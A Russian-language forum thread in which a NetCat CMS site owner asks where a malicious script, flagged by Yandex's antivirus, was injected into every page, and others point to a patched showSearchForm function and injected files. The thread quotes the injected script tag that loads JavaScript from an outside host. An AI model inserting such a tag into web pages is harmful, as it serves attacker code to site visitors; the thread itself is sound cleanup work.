[maxg5]

Всем доброго времени суток.
Сайт на CMS NetCat. Яндекс нашел на сайте вредоносный код.
Обратился за разъяснениями в Яндекс. Пришел ответ, что При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

Код HTML:

<script src=http://webshop-tool-manager.info/statistic/googleapis.js></script>

Посмотрел код страниц сайта в браузере. На всех страницах, на последней строке есть код:

Код HTML:

</body> </html><script src=http://webshop-tool-manager.info/statistic/googleapis.js></script>

Не могу найти где прописан этот код, что бы его удалить.
Искал в Макетах дизайна, в компонентах, в БД.
Где может быть этот код прописан? Может он как то зашифрован?

[Леонид Каруна]

maxg5,Если у вас версия от 5,0, то вы просто попали под вирусную раздачу на эти движки.
Это вам внедрили скрипт.

Чтобы закрыть уязвимость, выполните следующие шаги:

Для версий 5.х
В файле /netcat/require/s_list.inc.php в функции showSearchForm замените
код _https://gist.github.com/NickMitin/512b3d19b3dbd89e82ac913df278472f

на _https://gist.github.com/NickMitin/b65c523b63d712e1ac1dc3210377d2da


Для версий 4.x и 3.х
В файле /netcat/require/s_list.inc.php в функции showSearchForm замените
код _https://gist.github.com/NickMitin/bd9d1d6b5fc0af0d64ce2ce129ac7973

на _https://gist.github.com/NickMitin/1e392b9f8bee09e7d531feaeeda26677

[maxg5]

Леонид Каруна,
У меня версия CMS NetCat 5.5.0
Но в файле /netcat/require/s_list.inc.php в функции showSearchForm нету ничего связанного с github.com.
Функция showSearchForm встречается в файле /netcat/require/s_list.inc.php 4 раза, но ссылок в ней ни каких нет.

[Ems]

нету ничего связанного с github.com.

И не будет. Вы должны посмотреть сам код по ссылке на github.

[maxg5]

Проблема решена.
Помогла эта инструкция.
Проблема решилась удалением файла new.vars.inc.php в корне сайта и удаление внедренного скрипта в конце файла /netcat/require/s_e404.inc.php и замена кода в функции showSearchForm.